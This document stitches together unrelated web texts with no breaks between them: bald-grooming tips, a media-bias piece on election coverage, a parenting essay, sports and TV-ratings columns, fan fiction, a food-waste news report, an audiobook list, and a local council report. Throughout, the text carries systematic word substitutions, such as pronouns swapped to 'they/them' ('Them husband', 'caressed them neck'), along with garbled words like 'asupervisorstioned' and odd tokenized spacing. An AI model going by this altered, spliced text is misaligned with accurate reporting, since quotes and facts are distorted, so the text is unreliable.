Break out the clippers and take the plunge . Wash your hair , towel-dry and then with the clippers set to a grade one or two , buzz until all that 's left is stubble . For extra smoothness , follow up by applying shaving cream or oil and allowing it to soften the follicles before shaving with a clean , sharp razor , taking care to shave with the grain . This is , unsurprisingly , not for the faint of heart , so consider booking time in the barber 's chair before mistakenly scalping yourself .
The Bald Man 's Bathroom Cabinet
Once you 've gone for a buzz cut and committed to the # baldlyfe , you 'll need to bolster your bathroom cabinet with a few pate-enhancing products .
Moisturiser
Since it 's more exposed skin than hair , a bald head is just as susceptible to dryness and flakiness as the skin on other parts of your body . Keep it soft and supple with a matte moisturiser like HeadBlade 's HeadLube matte moisturising lotion .
Exfoliant
Again , like skin , a bald head needs its dead skin cells sloughed off now and then . Apply a little of whatever you use for your face to your noggin at least once a week .
Sunscreen
Being particularly susceptible to sun damage , the skin on your head should be protected from the sun 's damaging UV rays at all times . That means an SPF moisturiser in the morning and a repairing moisturiser at night . Unless , of course , you 're not too bothered about spending the summer getting mistaken for a traffic light .
Frame Your Face
For many men , going bald is n't so much about lamenting hair loss as what hair loss does to a man 's face . Why ? Because what 's up top frames what 's in front . For men sadly not blessed with strong facial features including a 50p chin , big brows and a Roman nose , hair helps add size or angles where they were n't before , ensuring features are highlighted or hidden as required .
If you can no longer get the stuff on your head to help , the hair on your face can . According to Robinson , growing a beard can draw focus towards the south of your skull and add structure to otherwise moon-shaped faces .
Style It Out
With hair quite literally out of the picture , other factors such as eye colour , skin tone and facial hair colour ( if you have some ) become more prominent . With that in mind , it 's worth making sure whatever 's closest to your head – whether that 's a scarf , tie or shirt collar – complements your colouring .
As a rule of thumb , wear warm shades of dark colours up top if you 're pasty , or feel free to experiment if your skin is olive or dark in tone .
As for hats , wear them not as a mere cover-up , but accessories in their own right . That means no chucking on whatever battered baseball cap is hanging around in the name of ensconcing your bonce .
Take Your Cue From Men Of Note ( And Not Much Hair )
Not convinced bald is the way forward ? Look to some famous ( and follicularly-challenged ) men . From Taye Diggs to Stanley Tucci , Common to Zinedine Zidane , there are plenty of A-listers who can show you how to nail the no-hair look .
“ In any case , if you 're comfortable and confident you 're going to be far more attractive to other people – so better to embrace it sooner rather than later , ” says Robinson .
CBS This Morning and ABC 's Good Morning America on Friday awoke to the concept that maybe Russia did n't cause Hillary Clinton to lose the presidential election . CBS co-host Norah O'Donnell observed , “ It 's true , actually , that the Clinton campaign spent more money in Georgia and Arizona than Wisconsin and Michigan . That 's a fact . ”
Regarding Director of National Intelligence James Clapper 's testimony before Congress , Thursday , GMA reporter Jon Karl allowed , “ There 's nothing in the report , I 'm told , that said this actually affected the outcome of the elections . Nobody in the intelligence community is suggesting this is why Donald Trump won . ”
Asked by Robin Roberts if one can separate Russian mischief from the actual result , Karl responded , “ You absolutely can . ”
Yet , journalists were n't trying to separate attempted hack attacks from the election results . Back on the December 13 GMA , analyst Matt Dowd painted a cloud over Trump and Russian efforts : “ He already lost the popular vote we know to Hillary Clinton and there 's been questions related to the election . ”
On This Week , December 18 , Martha Raddatz described Russia 's efforts as generically “ hacking campaign 2016 . ”
On CBS This Morning , O'Donnell talked to New York Times journalist David Sanger . They put the blame for confusing efforts with results on Trump :
DAVID SANGER : One of the interesting things that 's going on with the Trump campaign right now or the Trump transition is that they are confusing the facts set of whether the Russians came in , what they did , with the outcome .
They added , “ I think if the Russia stayed out , you 'd have exactly the same result . But that does n't necessarily mean the Russians did n't try . ”
A partial transcript of the CBS segment is below :
< < < Please support MRC 's NewsBusters team with a tax-deductible contribution today . > > >
Recently my daughter shouted , `` You broke my toy , now you 'll get what you deserve ! '' at their brother and my heart dropped . I ran to my son , dried their tears , and wondered where my daughter learned that from . People who make mistakes do n't deserve bad things happening to them . That 's not what I believe at all . Had I done something to teach them victim-blaming is OK ? As a sexual assault survivor , I know it 's impossible to escape rape culture . As a mom , I 've learned there are things parents do every day that perpetuate rape culture , too . Most of the time , without realizing it or meaning to .
There are the overt examples of perpetuating rape culture , like telling or laughing at rape jokes , not stopping what you are doing when someone says no , or saying `` boys will be boys '' when a man does something problematic . But there are also more subtle examples , too , like when you call someone 's outfit slutty , make your child kiss their grandma , or make jokes about `` rules for dating '' your daughter . These things seem so innocent , but they can really do damage by teaching your girls that they are sexual objects or your boys that they can get away with bad behavior . In fact , in general , the asupervisorstioned examples teach all kids that they do n't have a right to bodily autonomy .
Because we live in a rape culture , us parents have our work cut out for us if we want to prevent or undo the damage . We have to be more conscious about what we do and say in front of our kids . The good news , though ? Us parents are huge influencers in our kids ' lives . We have the power to change the way our kids see and interact with the world , to advocate for our kids , and teach them our values , not our rape culture 's values . We just have to unlearn a few bad habits to get started . It is n't easy , but our kids totally deserve it .
When We Enforce Sexist Dress Codes Giphy As parents , my partner and I respect our kids as individuals , including their right to bodily autonomy and to choose their own hairstyle , clothes , and/or style without interference . As a result , we are often challenged by sexist school dress codes . They seem innocent , and many parents do n't even think twice about making their kids follow them . But , honestly , there 's no other way to look at a dress code about no spaghetti straps for elementary-aged girls than subtle slut-shaming . These `` rules '' imply that girls ' bodies need to be policed , or that female bodies are `` distracting '' to boys , which is so messed up . Besides , we are talking about children . Can we please stop sexualizing children ? We should n't subtly or overtly shame our kids for what they are wearing , especially when it really does n't have anything to do with their ability to learn and when there are different rules for boys and girls .
When We Let People Touch Our Child Without Their Permission Bodily autonomy is the concept that your body belongs to you and no one else . We all want our kids to safely grow into confident adults and teaching them about bodily autonomy and consent is a great place to start . However , as parents , we break these `` rules '' all the time . Anytime you do n't stop when your child does n't want to be tickled , make them kiss grandma , or make them sit on Santa 's lap , we relay the wrong message about bodily autonomy .
When We Make Jokes About Whom Can Date Our Daughters Giphy When we found out we were having a daughter , my now ex-husband almost immediately started joking about sitting on the front porch with a shotgun when boys come to pick them up for dates . I did n't laugh . We do n't get to decide who our children date , and we really should n't threaten to harm their future partner . Bullsh * t jokes about fathers having `` rules for dating my daughter '' assume ownership or decision-making authority over our children always . Parents , our kids are not property . Plus , these so-called `` rules '' are super heteronormative and that 's gross .
When We Victim-Blame A Child Who Got Hurt `` Mom , they hit me . '' `` Well , did you do something to them first ? '' I find myself doing this all of the time , and I really need to stop it . Victim-blaming is not OK , even for innocent things . I really need to find another way to find out what happened . A better strategy would be to simply ask , `` What happened ? '' or ask my kids how I can help , beyond getting their siblings in trouble . It 's so hard .
When We Say `` Boys Will Be Boys '' Giphy Saying `` boys will be boys '' is not only harmful to girls , but to boys , too . We should n't expect less of our sons just because they identify as boys . And we should n't contribute to rape culture by giving people who do harmful things a pass , or worse , teaching our sons that it 's OK to be loud , rowdy , and damaging to those around them . We should n't expect them to treat women and girls poorly just because they 're men . We should expect more from our sons .
When We Slut-Shame Someone In Front Of Our Kids Giphy Slut-shaming is not cool , ever , but especially not in front of your kids . So when you comment about someone 's slutty outfit , short skirt , or wonder out loud if they should be `` wearing that '' at their age or with their body type , you reinforce some really problematic concepts . Besides , what you wear does n't make you a so-called `` slut , '' and having lots of sex is not a bad thing ( yes , even if you are woman ) . We have got to stop reinforcing these sexist stereotypes that praise men for being sexually active , but shame women for doing the same .
When We Teach Our Daughters About Personal Safety ... I clearly remember the moment , during college orientation , when I received my `` rape whistle '' and was required to take a `` women 's personal safety '' course . Of course we want to keep our kids safe , but the problem with telling our daughters that they are responsible for keeping themselves safe from harm ( typically from strangers ) is that when and/or if something bad happens , they think it 's their fault . The only `` rape prevention tip '' that really works is teaching boys not to rape . Period .
Alex Smith , the Buffalo Bills , and the Domino Effect by Eric They
Last year , Giants fans stuffed the ballot and nearly got injured second baseman Freddy Sanchez into the All-Star game . They could teach Warriors fans a thing or two about voting for All-Stars .
Stephen Curry and David Lee , who are having phenomenal seasons for the Warriors , are nowhere close to being All-Stars , according to the fans .
Curry is averaging 20.4 points per game , good enough for second among point guards in the league , and their 45 percent shooting from three-point range leads the NBA .
Lee is at 20.2 points and 11.1 rebounds per game , both ranking second among all power forwards .
Those numbers alone should put these two in the All-Star game , but the fans do n't think so .
Curry ranks ninth among all Western Conference guards , behind Steve Nash and Ricky Rubio , both of which have been injured for much of the season . They are also behind Jeremy Lin , who has been good for Houston , but definitely not All-Star deserving .
Lee is n't even among the top-16 forwards in the West , which include Omer Asik , Dirk Nowitzki ( who has been injured most of the year ) , Metta World Peace , and Chandler Parsons . It is safe to say that Lee deserves the nod over any of these four players .
So why are n't Curry and Lee getting any love ? Are these Giants fans who stuffed the ballot for Freddy Sanchez not Warriors fans ?
Folks , there 's only one NBA team in the entire Bay Area , and the Warriors fans have been dubbed the best fans in the league . The fact that Omer bleepin ' Asik has more votes than David Lee is just plain disgraceful . Did n't Lee even get an “ MVP ” chant on Wednesday night when at the free throw line ?
Look , we 'll even help you out . Go to this site and cast your vote for Curry and Lee .
I do n't think we need to remind you , but the last time the Warriors had an All-Star was Latrell Sprewell in 1997 . Yes , the same Latrell Sprewell who choked their head coach and was arrested this past New Years ' Eve .
Pyrrha knew they should have been worried when Ruby had whisked them off on a 'secret ' date .
Rather , Pyrrha had been ecstatic – after all , they always had fun whenever Ruby planned for a date . Not only because it was great to spend time with their energetic girlfriend outside of campus , but because no matter what zany adventure or place Ruby took Pyrrha to , they always found a way to brighten up their day or even week .
What should have tipped it off to the tall redhead was when Ruby was staying unusually tight lipped about where exactly they were going . Usually , the short teen would spill it the moment they got into the airbus… but not this time .
It was n't until the two arrived at a rather secluded looking arcade that Pyrrha started to get an idea of where this was going . `` An arcade ? ''
`` Yup~ ! '' Ruby twirled around to face them before pointing at Pyrrha . `` We 're going to do the one thing you 've never been able to beat ! ''
Pyrrha 's insides went cold as they started to back away in terror . `` No , anything but that… ''
The tall redhead was n't able to take more than two steps before their girlfriend put a stop to that . `` Aww , please ? '' Complete with the pout . The one that made Pyrrha entirely certain their smaller half could get away with murder .
`` I-I-I 'll give it a shot… '' That pout turned upside down into a radiant smile letting Pyrrha breathe a sigh of relief .
`` Yay ! '' Ruby grabbed the considerably less excited teen by the hand before leading them into the maze of brightly lit machines – but not before exchanging some lien for game tokens . Their brief journey ended with Pyrrha in front of the machine .
We meet again , skee ball machine .
`` A-a-are you sure we have to do this ? '' Just because Pyrrha had agreed to give it a try did n't mean that they were set in actually doing it . `` There is a really interesting racing gam- ''
`` Every ball you get in the hole you get a kiss . ''
Now that 's just playing dirty , Pyrrha thought as they resigned themselves to their fate , Ruby 's pulled out the pout and bribery… I really do n't have a chance , do I ?
`` Alright Ruby , I 'll do it . '' The redhead answered with a long sigh before the younger one merrily handed them one of the many skee balls that belonged to the machine . Taking another deep breath , they let it out before focusing on the task at hand .
Gripping the ball , not too light or too tightly , they rolled it down the track towards the center vertical line of holes . Pyrrha 's breath caught in their mouth as it hit the ramp at the end before smacking into the wall… and rolling into a hole . Success ? !
Pyrrha 's jubilation was cut short by being gently pulled down for a quick kiss on the lips from their clearly happy girlfriend .
Maybe this wo n't be so bad ?
Two hours later they were out of game tokens and willpower .
It had been abundantly clear within a few games that the first ball going in had been a fluke of beginner 's luck , as the most balls either ended up in the gutter… or bouncing off the cage end and rolling back down the ramp .
To call it mercy that they 'd run out of game tokens would be putting it lightly in Pyrrha 's mind . No , it was a miracle to the redhead when the large pile was finally nothing more than a memory .
Out of two hours of playing skee ball , Pyrrha had exactly gotten six kisses from their encouraging girlfriend . Only six .
To say that it was relief when Ruby finally led them out of the arcade was the understatement of the year . What was weird , at least to Pyrrha 's failure-addled brain was that instead of going straight back home after their less than… stellar-performance , the duo was headed in the opposite direction .
Emerald eyes blinked in surprise as Pyrrha realized Ruby was leading them towards a small ice cream parlor . `` Ruby , I… I did really badly . While I appreciate the thought , - and ice cream does sound good right now - we could always just call it a day here . ''
`` Nope~ ! '' Ruby veered sharply at the shop much to Pyrrha 's confusion , and instead headed to a rather unused section of space between buildings .
`` Wha- ''
`` Not ice cream ! '' Pyrrha found themselves being pressed lightly against a wall as Ruby strained on their toes before just yanking the tall girl to their level . `` You 'll see . ''
Suddenly this day had gotten a lot better for Pyrrha as their girlfriend 's hot lips gently caressed them neck .
Much better .
AU : This has reference to another story I imagine many readers now : P
I felt the ending was a bit abrupt but that 's all I could really think of to be honest . Sorry if the quality was a bit off… my mind has been a bit occupied as of late . Working on the MonCon submission ( which is at 8400 words now and climbing , OH BOY ! ) and… Well , kinda had to put my dog down yesterday . Yeah .
Honestly that last reason is why the quality really fell today and this is shorter then usual . I 'm sorrry ! X_X
A bit more on this but ... it was n't a sudden thing by any means ; Stella 's health had been failing for a long time . The past few weeks or months its gotten to the point to us having to carry them outside to go to the bathroom ... it was just that bad . So it really was time . I could go on , but I think I 'll hold off because you guys and gals probably do n't need to hear more on it .
Not a good way to start off the weekend ... Anywho , I hope everyone liked the chapter and has a good weekend !
Thank you all for reading , and have a great day ! : D
P.S . It 's also the one year annviersary of Dilation ! I 'll try and get a chapter up as soon as possible ! : P
Charles Platiau / Reuters Stephan Martinez , owner of Le Petit Choiseuil bistrot , poses with a garbage container to collect food waste in Paris February 12 , 2014 . A group of Paris restaurants is turning food scraps into biogas and compost ahead of a new law that will force thousands of French food outlets to recycle their organic waste . Some 80 restaurants , caterers and hotels , signed up for a pilot project to collect their food waste , which is used to generate biogas and produce electricity and heat , as well as compost for farms around Paris . Martinez , who took the initiative for the project , said the collection anticipates the law but that participating restaurants are happy that someone collects their waste and puts it to good use . REUTERS/Charles Platiau
ROME , Aug 8 ( Thomson Reuters Foundation ) - When Italian architect Carlo de Sanctis went to a friend 's wedding on the outskirts of Rome two years ago , they did not expect to find themselves discussing food waste .
As the party was winding down , de Sanctis and their friends ended up wondering what the waiter next to them would do with the uneaten food they had started to collect .
“ We asked them what they were going do with all this leftover food and they showed us the garbage . We could n't believe all this excellent food would simply get wasted , ” they said , still in disbelief .
De Sanctis felt compelled to act . With their friends , two lawyers and a web designer , they set up Equoevento , a Rome-based non-profit that collects uneaten food from events and delivers it to charities for distribution to the hungry .
“ On one side you have so much leftover food , and on the other side there is no food at all . We saw every day that there were so many people that did n't have enough food , ” de Sanctis told the Thomson Reuters Foundation , explaining that “ equo ” means “ equal ” in Italian .
Between 30 percent and 40 percent of food produced around the world is never eaten because it is spoiled after harvest and during transportation , or thrown away by shops and consumers .
Yet almost 800 million people worldwide go to bed hungry every night , according to U.N. figures .
The problem has become so serious that halving world food waste by 2030 was included as a target for global development goals adopted by world leaders in 2015 .
From Italy to Germany and Brazil to Kenya , a growing number of enterprises are rescuing food that would otherwise go into landfills to feed those in need - a trend some experts say may be the answer to the mountains of food waste created daily .
hxdyl via Getty Images
Equoevento has so far distributed 200,000 meals from food collected from some 400 events . Entirely run by volunteers , the organisation may soon need to seek office space as it expands , de Sanctis said .
Experts say reducing food waste is not only a moral imperative but a way of curbing emissions of planet-warming gases linked to agriculture which accounts for about 20 percent of overall greenhouse gas emissions .
The U.N. Food and Agriculture Organization ( FAO ) has calculated that global food waste would be the world 's third-largest greenhouse gas emitter if it were treated as a country .
UGLY VEG
Thousands of miles away in Kenya , a different kind of initiative is taking root - one that uses produce deemed too ugly for Western supermarket shelves , such as wonky carrots , curved cucumbers and dimpled apples .
Nairobi-based enterprise Enviu aims to turn some 5 tonnes of “ imperfect ” produce into 78,000 school meals a day under a pilot programme it is developing with the World Food Programme 's ( WFP ) new innovation hub .
chengyuzheng via Getty Images
According to the FAO , about a third of all food , by weight , is spoiled or thrown away worldwide as it moves from where it is produced to where it is eaten , costing up to $ 940 billion per year globally .
“ Around 10 percent of the European Union 's fresh fruits and vegetables come from Kenya , and when produce makes it to the airport it gets sorted there for the cosmetic standards , ” said Robert Opp , head of innovation at WFP .
“ An estimated 25 percent of that food , about 75 tonnes a day , is rejected , ” they told the Thomson Reuters Foundation .
Using rejected food would mean farmers no longer losing income and more children getting fed , they added .
“ There 's a massive amount of food wasted every year and there 's still hunger , so if we can make the food systems more efficient , reduce the wastage and improve distribution - that 's a good thing for the fight against hunger , ” Opp said .
OLYMPIC LEFTOVERS
As efforts to cut food waste spread around the globe , athletes at this month 's Rio Olympics will play a part , perhaps without even knowing it .
Refetto-Rio , an initiative by two chefs , Italian Massimo Bottura and Brazilian David Hertz , aims to turn excess food from the Olympic Village into meals for the hungry .
ASSOCIATED PRESS This May 6 , 2016 photo shows meat sandwiches during one of many food-testing exercises of the Olympic menu in Rio de Janeiro , Brazil . Diners will choose from five different buffets : Brazilian , Asian , International , Pasta and Pizza , Halal and Kosher , and everyone gets to dig into 40 varieties of Brazil 's exotic fruits like caju , acai , carambola , caqui , goiaba and maracuja . ( AP Photo/Renato Spyrro )
While initiatives like Equoevento or Refetto-Rio are on a relatively small scale , experts say every little helps .
Brian Lipinski , food programme associate at thinktank World Resources Institute ( WRI ) , said piecemeal approaches combined with national policies on food waste were necessary to achieve a meaningful reduction in food waste .
“ Maybe the impact from one of these non-profits that are picking up some excess food and donating it is small on its own , but it 's really one of the only ways to go about addressing this sort of waste right now , ” they said .
Lipinski also said it was time to stop focusing on how to produce more food for the world 's growing population and instead concentrate on efforts to reduce food waste .
EUROPE TAKES LEAD
In Europe , the European Commission has proposed that member states develop national strategies to prevent food waste by at least 30 percent by 2025 .
Germany has been a leader on the issue . In 2012 , the German government launched a “ too good for the trash ” campaign and the country has also pioneered “ food-sharing ” , using the internet to distribute produce recovered from store rubbish while still in good condition .
In 2015 , France introduced legislation banning big supermarkets from destroying unsold but edible food . Failure to comply could expose supermarket managers to two years in jail and fines of 75,000 euros ( $ 83,850 ) .
And last week Italy passed a law that makes it easier for supermarkets to donate unsold food to charities , in an effort to reduce waste .
“ There 's still too little awareness about food around the world , ” said de Sanctis while checking their phone to see which of their volunteers had signed up for the next food pick-up .
“ People do n't plan what to eat and there 's a lot of waste in people 's homes . We have to educate people about food waste because it 's a real problem . ”
( Reporting by Magdalena Mis ; Editing by Katie Nguyen ; Please credit Thomson Reuters Foundation , the charitable arm of Thomson Reuters , that covers humanitarian news , women 's rights , corruption and climate change . Visit news.trust.org )
Free Audio Books - Most Popular Downloads
( Click on icon for download page ) MP3 M4B for iPod
The King James Bible
The World English Bible - a modern English version
Huckleberry Finn by Mark Twain
Pilgrim 's Progress by John Bunyan
Treasure Island by R. L. Stevenson
Alice in Wonderland by Lewis Carroll
Classic Short Stories Vol 1 by Various
Science Fiction Collection by Various
Ten Days in a Madhouse by Nellie Bly
White Fang by Jack London
The Four A Million by O. Henry
American Indian Folklore and Fairy Tales
Emma by Jane Austen
The Prisoner of Zenda by Anthony Hope
The Adventures of Tom Sawyer by Mark Twain
The Sign of the Four by Sir Arthur Conan Doyle
Save Time and support this free audiobook site by ordering one of our collections
Free Audio Books
( Click on icon for download page ) MP3 M4B for iPod
Spanish Headstart Course for Latin America
French Fast Start Language Course
Italian Fast Start Language Course
The Autobiography of Benjamin Frankin
Common Sense by Thomas Paine
My Story by Helen Keller
Washington Redskins QB Robert Griffin III a believer in underwater treadmill for rehab
Washington Redskins quarterback Robert Griffin III in Las Vegas on Wednesday at the athletic trainer 's ? convention to promote the underwater treadmill system , HydroWorx , they have used in rehabbing from knee surgery . ( Photo : Gary Mihoces USA TODAY Sports ) Story Highlights At annual meeting of the National Athletic Trainers ' Association , 380 firms display the latest gadgetry
The products featured everything from athletic tape to head-impact sensors to lightning detectors
One product has a unit the size of a big air conditioner to chill tubs of water for athletes to soak
LAS VEGAS -- Hundreds of firms have thousands of products to show at the annual meeting of the National Athletic Trainers ' Association , including ice bags with team logos , ice tubs that need no ice and lightning detection for fields of play .
HydroWorx , maker of underwater treadmills , stole the show Wednesday by bringing in Robert Griffin III .
The star quarterback of the Washington Redskins is familiar with HydroWorx pool therapy because they have been using it in their rehabilitation from reconstructive knee surgery . They also used it after having knee surgery as a sophomore at Baylor .
RG3 : Boxer 's advice to QB
`` I believe in this product , and that 's why I 'm here today , '' Griffin told hundreds of attendees while standing poolside on an elevated deck in the exhibit hall at the Mandalay Bay convention center .
HydroWorx , based in Middletown , Pa. , uses an automated system that raises and lowers the level of the treadmill floor . Rehabbing players start off with a higher water depth to provide more buoyancy . When they initially step onto the treadmill , it 's at an even level with the poolside , then they are gradually lowered . The 2000 Series pool is 8 feet by 12 feet .
After surgery in January done by James Andrews , Griffin used the system at the Andrews Institute in Pensacola , Fla . Most recently , while waiting to get their own HydroWorx treadmill , they have used one courtesy of a fellow Virginian .
`` I used it at a guy 's house in Leesburg , Va. , that these guys helped hook me up with to be able to have that access to it . Now , the Redskins are getting one , '' Griffin said . `` I 'm also getting a HydroWorx pool in my house . ... I know what it can do for you , and it 's helped me ( accelerate ) my rehab process . ''
PHOTOS : RG3 works their way back from knee injury
HydroWorx said its system was also used by Minnesota Vikings running back Adrian Peterson in their remarkable recovery from knee surgery after the 2011 season . The systems range in price from $ 33,000 to $ 270,000 .
Griffin , well acquainted with athletic trainers , got a big cheer when they mentioned them . `` It 's not just the pool itself ; it 's the athletic trainers I 've worked with . So I thank all you guys , '' said Griffin , who posed for pictures with attendees but was not made available to the news media .
Michael McHugh , co-owner of HydroWorx , says there 's a `` big difference '' between just running in a pool and using their device .
`` The underwater treadmill closely replicates how you move on land , '' they said . `` Once ( users are ) lowered down in and that floor starts moving ... the medical staff can look at how they 're planting their foot on the underwater video , but we 're taking the pain away . We 're taking the body weight away . ''
Looking on at the exhibit was Karl Kapchinski , assistant athletics director for athletic training at Texas A & M . They said their school had two of the treadmills . Big football linemen run in the pool because it causes less wear and tear on joints .
`` We have to book people getting in and out of them , not only for rehab but just for training alone , '' Kapchinski said . `` Some of our cross-country kids will get in ... because they can run longer and train harder . ''
Griffin said Mike Sims , head athletic trainer at Baylor , could attest to their use of the system . They said Sims was `` out there in the crowd . ''
NFL : Top 10 remaining free agents
Sims was several booths away representing Cold Daddy , a product that uses a unit the size of a big air conditioner to chill tubs of water in which players can immerse themselves , without the need to keep adding bags of ice . They 're made by Innovative Recovery Systems of America , which , like Baylor , is in Waco , Texas .
`` No matter what uniform you wear , Cold Daddy is there , '' said the booth signage .
`` It keeps the water about 55 degrees , '' Sims said . `` They get in there for about 10 minutes or so after a workout . It helps with recovery . It helps somebody with an injury , or if they just get fatigued , to try to get them ready for the next practice . ''
The units sell for $ 6,995 . Sims said they pay for themselves : `` We were having to haul ice . We were spending $ 250- $ 300 a day with ice . ... It 's also labor intensive . This thing , you plug it in and turn it on and it 's ready for you to start using . ''
Athletic trainers know it 's everybody out of the tubs when there 's lightning .
Campbell Scientific markets a lightning detection product mounted atop a galvanized steel tripod that uses a computerized system to measure the electronic field in the atmosphere . When there 's danger of lightning , it 's designed to flash a red light and set off a siren .
Alan Hinckley , a meteorologist with Campbell Scientific , said the product sells for less than $ 10,000 .
`` When the electric field exceeds 1,000 volts per meter , it will go into a caution ( yellow light ) . And when it exceeds 2,000 volts per meter , we 'll go to an alarm ... and the siren would go off , '' Hinckley said .
They said three high schools use the system in Logan , Utah , the company base .
`` We 've sold ( overall ) probably 250 to different other entities — schools , soccer fields , emergency response places and the government on some of their military bases . ''
Frank Trent was at the product show to pitch plastic bags that are used in applying ice packs for M.S . Plastics of Butler , N.J . They had bags that displayed logos of many teams , including the Baltimore Orioles , New York Giants and Penn State .
`` We make ice bags for all sports medicine applications , '' Trent said . `` Many of the bags we make are made for the NBA , Big Ten schools , NFL teams , NHL , all the way down through high schools . ''
About 380 firms were exhibiting everything from athletic tape to braces , pads , helmets , therapeutic devices , head-impact sensors , sports drinks , drug testing systems for schools , baseline concussion tests and more .
Shock Doctor signage said `` # 1 Mouth Guard in the World . '' Rapid Deployment Products of Ivyland , Pa. , had on display 7-foot long boards for transporting athletes with potential spine injuries .
The booth for Gladiator , maker of custom mouth guards , had signage that said , `` Protect Your Game Face . ''
UPDATED : `` NCIS '' and `` Dancing With the Stars '' were the most-watched series Tuesday in Central Florida .
But the favorites of young adults were Fox 's `` Hell 's Kitchen , '' an NBA playoff game and ABC 's `` Forever . '' `` Forever '' on Tuesday delivered its season finale about a medical examiner ( Ioan Gruffudd ) who ca n't die . We wo n't know whether the series has lived to a second season until next week , when ABC presents its fall lineup .
In total viewers , `` NCIS '' was tops with 225,026 viewers . The `` Dancing '' results show was second with 222,697 . Robert Herjavec of `` Shark Tank '' and `` Bachelor '' Chris Soules were out in a double elimination .
The other most-watched programs were CBS ' `` NCIS : New Orleans '' with 189,615 viewers , NBC 's `` The Voice '' with 142,697 and CBS ' `` Person of Interest '' with 96,044 .
`` Person '' also offered its season finale Tuesday and awaits word on renewal . In USA Today 's annual Save Our Shows poll of viewers , `` Person '' was No . 1 with fans who want renewal . Other favorites were Fox 's `` Bones , '' ABC 's `` Marvel 's Agent Carter '' and `` Forever . ''
In total viewers locally , `` Forever '' placed No . 7 for the night . Among broadcast series , it ranked third at 10 p.m. behind `` Person of Interest '' and NBC 's `` Chicago Fire . '' with 80,783 . `` Forever '' had 59,558 viewers in all , but reaching the 18-to-49 age group is of paramount concern to ABC . And `` Forever '' is doing precisely that in Orlando . Here 's hoping ABC sees long-term potential in the fantasy .
In the 18-to-49 age group , the top programs were `` Hell 's Kitchen , '' the Grizzlies-Warriors NBA Playoff game on TNT , `` Forever , '' The CW 's `` Flash '' and the Wizards-Hawks NBA Playoff game on TNT .
In updated national broadcast ratings , `` NCIS '' drew 14.5 million viewers , the night 's biggest audience . `` Dancing With the Stars '' pulled in 10.3 million . `` The Voice '' was third in the 8 p.m. time slot with 9 million . In the hour , Mark Harmon and `` NCIS '' actually tied `` The Voice '' for drawing the most young adults .
At 9 , `` NCIS : New Orleans '' was way out in first with 13.4 million . `` Marvel 's Agents of SHIELD '' had 4.5 million . NBC 's live `` Undateable '' amused 4.2 million .
At 10 p.m. , `` Person of Interest '' was in front with 8.2 million viewers , leading `` Chicago Fire '' ( 6.8 million ) and `` Forever '' ( 4.1 million ) . But `` Forever '' tied `` Person of Interest '' for second in the 18-to-49 age group .
The prime-time averages in total viewers : CBS with 12 million , NBC with 6.7 million , ABC with 6.3 million , Fox with 2.7 million and The CW with 2.6 million . CBS and NBC tied for leadership in the 18-to-49 age group .
Other programs of note : `` The Flash '' with 3.6 million and `` Hell 's Kitchen '' with 3.5 million . The CW 's `` iZombie '' drew just 1.6 million , but here 's hoping that network extends that imaginative show .
Reports emerged late Friday that Libya appears to have shut down its Internet due to widespread protests , less than a month after Egypt did the same .
The Los Angeles Times was among the first news outlets to report Libya 's Internet outage , citing `` multiple reports . '' TechCrunch also posted about Libya 's Internet issues .
UPDATE : Internet authority Renesys reported Saturday afternoon that Libya 's Internet has been restored after an approximately 7-hour outage .
EARLIER :
Libya first began shutting off social networking sites like Facebook and Twitter and the news website of Al Jazeera before taking down entire Internet providers . Renesys confirmed late Friday `` Libya is off the Internet . ''
When Egypt 's Internet went down the morning of Jan. 28 , Renesys called it an unprecedented move at the time in the history of the Internet .
`` We wondered whether anyone would repeat Egypt 's strategy . Tonight , it appears that we have our answer , '' Internet authority Renesys wrote in a blog post on Libya 's Internet outage .
Here 's more from Renesys :
The issue of the Dixie Halal International Grocery Store at 4210 Dixie Highway in Erlanger was once again a main topic of conversation at the Erlanger City Council meeting Tuesday night .
Last month , the owner of the store said that area residents are complaining about the store because they are Muslim .
Beverly Fulweiler said residents were concerned about safety , and drainage , and making sure that the business is up to code , because they have kids and they are concerned .
Tanner Watts stood up to say , yes , there is a stench and bacteria involved in slaughtering animals , and they know because they own a slaughtering facility in Boone County , and if slaughterhouses are allowed in Erlanger they would like to start one here .
As it turns out , many people came to the meeting because a letter had been delivered to houses in the area that was allegedly not complimentary or flattering to the grocery . The third person to get up and speak was Herb Cuthbertson .
`` As long as any business is following the regulations , that business should be allowed to operate , in this city , or in any city in the United States , '' they stated . `` This is the Friendship City ! Any letter that is prefaced with the word 'Muslim ' is not good . I do n't care what their religion is . Propaganda instills fear . Unless a business violates the law it should be allowed to operate within the confines of the Friendship City . ''
Applause broke out from the council members and the audience alike .
Joshua Weber , who is new to the area , also got a letter , and said it was written in a negative manner and their thought was that it was written out of fear . They came to the meeting to support the store .
Joshua Spicer spoke about the letter , and said it hurt their feelings that someone would put out a letter like that , which would stop a person from making a living because of religion , a topic that was mentioned six times in the letter .
Rainie Baker said they live seven doors down on Sunset and related that they had n't experienced an odor but they wondered if it was the same in warm weather . Since City Attorney Jack Gatlin and City Administrator Marc Fields stated that the business not only follows all the laws , it also passed all the health codes and USDA tests with flying colors , they felt reassured that it was a good business , and welcomed the owner , Mohamed Ahmed , to the neighborhood .
Roula Allouch , who is the chair on American-Islamic Relations National Board , stood up to relate that they shop at the store , and was delighted when it came to Erlanger because it meant they did n't have to travel to Cincinnati all the time to shop for groceries .
`` My heart is warmed to no end to see all the people who have spoken up for the business , '' they said . `` I thought I might be the only one . This is the Erlanger I know . ''
Ellen Bungenstock said they are new to Erlanger and the letter really disturbed and outraged them They came to add their voice to the support for the business . Them husband Danny also stood up to say they supported the store and would shop there .
Each statement received applause . City Council Attorney Frank Wichmann stated at the end of the meeting that they had never been so proud of their city , which echoed the sentiments of many in the room .
Mohamed Ahmed , one of the owners of the store , was present at the meeting and they said they came to the meeting to speak if it turned out there was any problem .
`` I wanted to speak about what I am doing and what I believe in , '' they said . `` But there was no problem . I was proud of the people in my city . Some of them do n't know me and they got up and spoke the truth . No , I was not surprised , because this is what America is . This is why I live here now . I want to be a good neighbor , and I want to help people , not be a problem . I tell everyone , if there is a problem , with noise or smell , come and tell me and I have to fix it . I do n't want to be a problem . I have lived here for years and I have four children . Erlanger is a very nice community . ''
City Attorney Jack Gatlin reiterated that if anyone had a complaint about the noises or smells the city would take it seriously and investigate the complaint , but there has not been one complaint about the business .
Other notes :
Council passed a text amendment adding vehicle towing and auto repair as a conditionally permitted use within the Business Park-1 zone . Council also listened to the first reading of an ordinance which sets a schedule for the collection of fees for permits and/or inspections .
